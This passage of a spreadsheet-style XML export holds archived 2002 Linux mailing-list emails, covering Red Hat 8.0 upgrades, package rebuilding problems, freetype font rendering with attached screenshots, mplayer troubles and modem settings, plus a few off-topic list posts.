  </si>
  <si>
    <t>Red Hat Linux 8.0 is now available.  Get priority access to the Red Hat\nLinux 8.0 upgrade by subscribing to Red Hat Network Basic service for just\n$60 USD annually.  Get it now:\n \n[URL]https://rhn.redhat.com[/URL]\n \nWhat does $60 a year get you?\n \n  * Instant ISOs of any Red Hat Linux public release for the duration of\n    your subscription.\n\n  * Priority access to updates and ISOs -- no busy signals, no searching\n    mirror sites, no waiting.\n\nWhat's new in Red Hat Linux 8.0, anyway?\n\n  * A new interface -- a user-friendly desktop with graphical enhancements\n    and improved menu organization.\n\n  * The latest Gnu Compiler Collection, gcc-3.2, and a specially tuned\n    and tested high-performace kernel, 2.4.18.\n\n  * Cutting-edge web server technology powered by the latest release\n    of Apache, 2.0.\n \n  * Updated graphical configuration tools that make setting up a Linux\n    server a truly point-and-click experience.\n \n  * A single interface for package selection during and after installation\n \n  * Enhanced personal security, featuring a point-and-click firewall\n    tool to protect your system from Internet intruders.\n \nHow do I upgrade once I subscribe to Red Hat Network Basic service?\n \n  * After purchase, you will be directed to the Instant ISO page.\n    From there, follow the instructions for downloading and installing\n    Red Hat Linux 8.0 from the ISO images.\n \nRead more at: [URL]http://www.redhat.com[/URL]\n \nDOWNLOAD 8.0 NOW.\n \nSubscribe to Red Hat Network Basic and start downloading Red Hat Linux 8.0\ninstantly.\n \n[URL]https://rhn.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://rhn.redhat.com http://www.redhat.com https://rhn.redhat.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 1 Oct 2002 15:11:27 +0200</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 15:11:27 +0200</t>
  </si>
  <si>
    <t>Re: Gabber packages for 8.0 (was: All set for Red Hat Linux 8.0)</t>
  </si>
  <si>
    <t>Once upon a time, Matthias wrote : &gt; I'm facing another problem right now. It looks like libsigc++ is no &gt; longer included in the distribution, and gtkmm won't compile without it &gt; :-/ I guess I'll have to repackage it myself for 8.0 (assuming it's &gt; possible). Well, I've made an updated libsigc++ 1.0.4 package. It rebuilds cleanly on 7.3 but the *.so* libraries are missing when trying to rebuild on 8.0 (the .a and .la files and everything else is though). Do you have an idea of what the problem may be? Julian : Do you want the .src.rpm to try to find the cause? Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.19 0.15 0.16 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Panu Matilainen &lt;pmatilai@welho.com&gt;\nDate: Tue, 1 Oct 2002 14:16:16 +0300 (EEST)</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 14:16:16 +0300 (EEST)</t>
  </si>
  <si>
    <t>On Tue, 1 Oct 2002, Angles Puglisi wrote: &gt; Is it possible to use new apt to do (null) to RH8 upgrade? Possible - should be, it was possible to update to (null) from RH7.3 with  apt. Did that on my laptop and well.. it was painfull to say the least  (including a ecovery from totally corrupted rpmdb) Don't expect it to be  an easy 'dist-upgrade' at any rate, so much stuff has changed and apt  doesn't always handle all that well the way dependencies are set in  RHL. &gt;  &gt; Even if it's possible, are there good reasons why maybe I should not do &gt; it and just use the RH iso's (I don't think RH8 will upgrade from &gt; (null), maybe up2date will)? It's possible but not supported by RH. I've upgraded both my laptop and my  home box from (null) to RH8.0 and didn't encounter any issues though. --  	- Panu - _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 1 Oct 2002 13:50:11 +0200</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 13:50:11 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Julian wrote : &gt; I would appreciate it if you could get Gabber packages for Red Hat 8. I  &gt; will be making a new release soon, but even in the meantime, 0.8.7  &gt; packages would be ok. &gt;  &gt; I know that in the beta, red hat was using a modified version of  &gt; gnome-libs which is incompatible with the latest gnomemm. If this is  &gt; still the case in 8, I can send you a patch which makes gnomemm work  &gt; again... I'm facing another problem right now. It looks like libsigc++ is no longer included in the distribution, and gtkmm won't compile without it :-/ I guess I'll have to repackage it myself for 8.0 (assuming it's possible). Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.28 0.15 0.10 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 1 Oct 2002 12:12:44 +0200</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 12:12:44 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Mark wrote : &gt; I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should-  &gt; work, maybe :) I've done that too, on many production servers. The only little (unimportant) catch is to replace "kernel-headers" by "glibc-kernheaders", a simple "apt-get install glibc-kernheaders" taking care of that. Upgrading between releases is meant to work, not between betas or beta and releases. The reason is simple : Some packages may have been downgraded, some others may have been rebuilt with the same versions but different dependencies. For both these categories of packages, the upgrade through apt/rhn/whatever just won't do, as some older packages might be considered as the newest, thus being kept on the system. As Red Hat does, I really don't recommend trying to upgrade between betas or from a beta to a final release either. Simply backup your /home, /etc (and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll probably save a few hassles and you'll get the cleanest possible system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forkit!" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Meltsner, Kenneth" &lt;Kenneth.Meltsner@ca.com&gt;\nDate: Tue, 1 Oct 2002 10:55:14 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 10:55:14 -0400</t>
  </si>
  <si>
    <t>"forkit!" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: MIT OpenCourseWare</t>
  </si>
  <si>
    <t>Better late than never -- I received a grant from Project Athena, MIT's original courseware effort, and found at the end that they hadn't thought much about distribution of the courseware.  Instead, they had gotten wrapped up with X and various Unix tools, and other useful, but not strictly educational efforts.\n\nKen\n\n\n&gt; -----Original Message-----\n&gt; From: B.K. DeLong [mailto:bkdelong@pobox.com]\n&gt; Sent: Tuesday, October 01, 2002 9:06 AM\n&gt; To: Eugen Leitl; forkit!\n&gt; Subject: Re: MIT OpenCourseWare\n&gt; \n&gt; \n&gt; At 05:38 PM 9/30/2002 +0200, Eugen Leitl wrote:\n&gt; \n&gt; \n&gt; &gt;Looks useful. Hopefully, they'll put up some more material soon.\n&gt; &gt;\n&gt; &gt;         [URL]http://ocw.mit.edu[/URL]\n&gt; \n&gt; I'll be sure to keep everyone posted on the next update. :)\n&gt; \n&gt; \n&gt; --\n&gt; B.K. DeLong\n&gt; bkdelong@ceci.mit.edu\n&gt; OpenCourseWare\n&gt; \n&gt; +1.617.258.0360\n&gt; +1.617.877.3271 (cell)\n&gt; \n&gt;</t>
  </si>
  <si>
    <t>http://ocw.mit.edu</t>
  </si>
  <si>
    <t>To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Tue, 1 Oct 2002 10:40:01 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 10:40:01 -0400</t>
  </si>
  <si>
    <t>On Tuesday 01 October 2002 01:27 am, Mr. FoRK wrote:\n&gt; [URL]http://www.rathergood.com[/URL]\n\nSome classics from this period, now in a new English translation:\n"The Sagas of Icelanders" in trade paperback, from (duh) Viking, in 2000.\nRemaindered at my local Barnes &amp; Ignoble.   The historical reference \nmaterial is useful.\n\nEirikur</t>
  </si>
  <si>
    <t>http://www.rathergood.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;\nDate: Tue, 1 Oct 2002 10:27:47 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 10:27:47 +0200 (CEST)</t>
  </si>
  <si>
    <t>&gt; Is it possible to use new apt to do (null) to RH8 upgrade? It might be, don't think anyone tried it yet. &gt; Even if it's possible, are there good reasons why maybe I should not do it and &gt; just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date &gt; will)? Yes ;) first off, redhat does not support upgrading from beta's to the released  version.  That doesn't mean it can't work, it means nobody tried it, they  sure didn't test it or fix anything to make it work, and you're on your  own. second, historically a new .0 numbers mostly means "so much has been  changed that you might have problems upgrading from any previous release  anyway".  So, historically, most users installing a .0 release do this  from scratch anyway, doing upgrades throughout x.0-&gt;x.y. If you want to avoid problems, bite the bullet and reinstall ;) Thomas  --  The Dave/Dina Project : future TV today ! - [URL]http://davedina.apestaart.org[/URL] &lt;-*-                      -*-&gt; And every time she sneezes I think it's love and oh lord I'm not ready for this sort of thing &lt;-*- thomas@apestaart.org -*-&gt; URGent, the best radio on the Internet - 24/7 ! - [URL]http://urgent.rug.ac.be[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Tue, 08 Oct 2002 23:41:46 -0700</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 23:41:46 -0700</t>
  </si>
  <si>
    <t>I wrote: &gt; [The bytecode interpreter] may improve non-antialiased rendering, but &gt; only at the expense of making a mess of antialiased rendering. Then again, perhaps the particular font I'm using just has bad bytecodes.  That font is "QuickType II", grabbed off my Windows partition, where it was installed by I-have-no-idea-which-application. Anybody else experimenting with bytecode-enabled freetype, presumably with different fonts?  Do you find the same bad antialiased rendering that I found, or do other fonts work well? _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-list@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Tue, 08 Oct 2002 23:15:07 -0700</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 23:15:07 -0700</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA) Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT Following further study, I've concluded:    1. It is easy to enable the bytecode interpreter.    2. This noticeably improves rendering of non-antialiased text.    3. This noticeably *harms* rendering of antialiased text. Point #3 probably surprises the rest of you as much as it surprised me.    Ever since turning on the bytecode interpreter, I've been bugged by a  sense that the antialiased text in my GNOME2 applications just looked,  well, wrong somehow.  I finally took some comparison screen shots with  and without the interpreter, and that made the difference crystal clear. Consider the two images attached below.  The first, "no-bytecodes.png",  shows some text rendered by a GNOME2 panel menu without the bytecode  interpreter.  Contrast this with the second, "bytecodes.png", taken with  the bytecode interpreter enabled. When the bytecode interpreter is turned on, notice that several  rendering anomalies appear:    - Several letters are narrower, giving the whole run of text a more      compressed feel.  This is especially noticeable in "R" and "o".    - The left side of the "Q" is painted in too light a shade of grey,      causing it to drop out somewhat.  "C", not in this sample, has the      same problem.    - "Qu" are set right up against each other, with insufficient      whitespace between them.    - "M" is distinctly asymmetric.    - The enclosed loop of "a" looks muddy, as it is partially filled      with grey.  Contrast with "a" drawn without the bytecode      interpreter, which has a nice clear open loop. Ick.  Perhaps this is why Red Hat turned the bytecode interpreter off.  It may improve non-antialiased rendering, but only at the expense of  making a mess of antialiased rendering. This may come down to a matter of personal aesthetics, but for my part,  I'm going back to Red Hat's standard packages with the bytecode  interpreter turned *off*. --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA) Content-type: image/png; name=no-bytecodes.png Content-transfer-encoding: base64 Content-disposition: inline; filename=no-bytecodes.png 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 /wCHLIpMysuGygAAAABJRU5ErkJggg== --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA) Content-type: image/png; name=bytecodes.png Content-transfer-encoding: base64 Content-disposition: inline; filename=bytecodes.png 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 --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA)-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roi Dayan &lt;dejavo@punkass.com&gt;\nDate: Tue, 08 Oct 2002 22:24:30 +0200</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 22:24:30 +0200</t>
  </si>
  <si>
    <t>Roi Dayan &lt;dejavo@punkass.com&gt;</t>
  </si>
  <si>
    <t>Laurent Papier wrote: &gt;On Tue, 8 Oct 2002 16:24:06 +0200 &gt;Matthias Saou  wrote: &gt; &gt;   &gt; &gt;&gt;Once upon a time, Roi wrote : &gt;&gt; &gt;&gt;     &gt;&gt; &gt;&gt;&gt;mplayer works with dga (if i am root) and works with x11 &gt;&gt;&gt;and always worked with sdl (but not now with redhat 8) &gt;&gt;&gt;now it gives black screen window and play the music of the movie. &gt;&gt;&gt;       &gt;&gt;&gt; &gt;&gt;Strange, because as I said in an earlier post, it works for me. Maybe &gt;&gt;you're missing the SDL_image or something? :-/ &gt;&gt;     &gt;&gt; &gt; &gt;It also works nicely for me. &gt; &gt;Laurent &gt;   &gt; [roi@roi roi]$ rpm -qa | grep -i sdl SDL_image-devel-1.2.2-3 xmame-SDL-0.60.1-fr2 SDL_mixer-1.2.4-5 SDL-1.2.4-5 SDL-devel-1.2.4-5 SDL_mixer-devel-1.2.4-5 SDL_net-1.2.4-3 SDL_net-devel-1.2.4-3 SDL_image-1.2.2-3 Seems I got all packages I need. It worked on redhat 7.3 I did upgrade not reinstall so packages shouldn't make a problem. Roi _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1034518125.8385c0@DeepEddy.Com&gt;\nFrom: Dag Nygren &lt;dag@newtech.fi&gt;\nDate: Tue, 08 Oct 2002 21:56:52 +0300</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 21:56:52 +0300</t>
  </si>
  <si>
    <t>Dag Nygren &lt;dag@newtech.fi&gt;</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1034518125.8385c0@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: Ringing bell on other computer</t>
  </si>
  <si>
    <t>&gt; &gt; &gt;  &gt; &gt; &gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it &gt; &gt; &gt;   Dag&gt; doesn't have the authorization to communicate with the &gt; &gt; &gt;   Dag&gt; laptop, beeing another user? &gt; &gt; &gt;  &gt; &gt; &gt; I don't know anything about the KDE sound server but I'd guess  &gt; &gt; &gt; your problem is the "environment" in which procmail runs.  You  &gt; &gt; &gt; don't say what procmail is running from.  In my case, for  &gt; &gt; &gt; example, procmail is run from fetchmail which is run by a cron  &gt; &gt; &gt; job. &gt; &gt;  &gt; &gt; Sorry about that, &gt; &gt; procmail is run by the qmail delivery agent to presort all mail &gt; &gt; I get. &gt; &gt; But anyway, I found an error message in procmail.log, which solved &gt; &gt; the problem. &gt; &gt; The following line in my delivery script seems to work fine now: &gt; &gt;  &gt; &gt; DISPLAY=:0.0 artsplay  &gt;  &gt; BTW, if you use exmhwrapper (found in the misc directory), you can generalize  &gt; this to &gt;  &gt; DISPLAY=`cat $HOME/.exmh/.display` artsplay  Yes, but that probably means that you have to have exmh running on the laptop to get the notification? With exmh getting upset by two instances running at the same time, this creates the problem that I cannot  run to the closest compter to check out the new mail. But thanks for the hint, I might use that for some other hack ;-) BRGDS Dag _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Colin Nevin &lt;colin.nevin@meritsolutions.ie&gt;\nFrom: John McCormac &lt;zzzzcc@hackwatch.com&gt;\nDate: Tue, 08 Oct 2002 18:36:01 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 18:36:01 +0100</t>
  </si>
  <si>
    <t>John McCormac &lt;zzzzcc@hackwatch.com&gt;</t>
  </si>
  <si>
    <t>Colin Nevin &lt;colin.nevin@meritsolutions.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] connecting at 1200bps in RH7.3 (help!)</t>
  </si>
  <si>
    <t>Colin Nevin wrote:\n&gt; \n&gt; Hi All,\n&gt; The modem handshake works at slightly higher speeds (4800bps to\n&gt; ~57600bps) but that is no good for tx/rx'ing data to the remote server\n&gt; as it insists at talking at the speed of treacle/1200bps.\n\nIt sounds like the flow control is set to Xon/Xoff rather than hardware.\n\n&gt; Baud 1200 7 data bits Even Parity\n\nUnusual -  8 n 1 is more common.\n\n&gt; \n&gt; I am doing a ATZ3 to reset the modem then I send this init string:\n&gt; \n&gt; AT&amp;F1E1V1Q0X4Y0S32=232&amp;A1&amp;B0&amp;C1&amp;D2&amp;H0&amp;I0&amp;K1&amp;M4&amp;N0&amp;P0&amp;R1&amp;S0&amp;U0&amp;Y1\n\nI think that the AT command for hardware flow control is &amp;E4 though this\nmay vary from modem to modem.\n\nRegards...zzzzcc\n-- \n********************************************\nJohn McCormac            * Hack Watch News\nzzzzcc@hackwatch.com       * 22 Viewmount, \nVoice:   +353-51-873640  * Waterford,\nBBS&amp;Fax: +353-51-850143  * Ireland\n[URL]http://www.hackwatch.com[/URL]\n********************************************\n\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: 2.6\n\nmQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+\nZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz\nTRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX\ntCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3\nYXRjaC5jb20=\n=sTfy\n-----END PGP PUBLIC KEY BLOCK-----\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.hackwatch.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roi Dayan &lt;dejavo@punkass.com&gt;\nDate: Tue, 08 Oct 2002 16:05:49 +0200</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 16:05:49 +0200</t>
  </si>
  <si>
    <t>Matthias Saou wrote: &gt;Once upon a time, Roi wrote : &gt; &gt;   &gt; &gt;&gt;oh xmms didn't work for me also &gt;&gt;i used mpg123 i tought its something from me &gt;&gt;     &gt;&gt; &gt; &gt;Nope, this is "normal" as Red Hat removed all mp3 support from 8.0 because &gt;of patent and royalty issues :-( &gt;On freshrpms.net, you can find the xmms mp3 plugin as I said, but also &gt;libmad, lame (mp3 encoder), and soon mpg321 as I often used it myself. &gt;Many other players can also play mp3 files, like alsaplayer, xine, mplayer. &gt; &gt;   &gt; &gt;&gt;like mplayer not working also and gives black screen &gt;&gt;     &gt;&gt; &gt; &gt;This is not normal though... &gt;Try "mplayer -vo help" then try usinf various output methods to see if some &gt;do work or not. &gt; &gt;Matthias &gt; &gt;   &gt; mplayer works with dga (if i am root) and works with x11 and always worked with sdl (but not now with redhat 8) now it gives black screen window and play the music of the movie. Roi _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 15:51:16 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 15:51:16 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] A Billy for the septics</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nTuesday, 8 October, 2002, 13:53 GMT 14:53 UK\nQuiz: Know your Cockney Rhyming Slang?\n\nCockney Rhyming Slang is alive and well with new terms being invented all\nthe time, according to the new Oxford Dictionary of Rhyming Slang being\npublished this week.\nBut do you know a Raquel Welch (belch) from a Billie Piper (windscreen\nwiper)?\n...\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nPlan to Sell a Home?\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
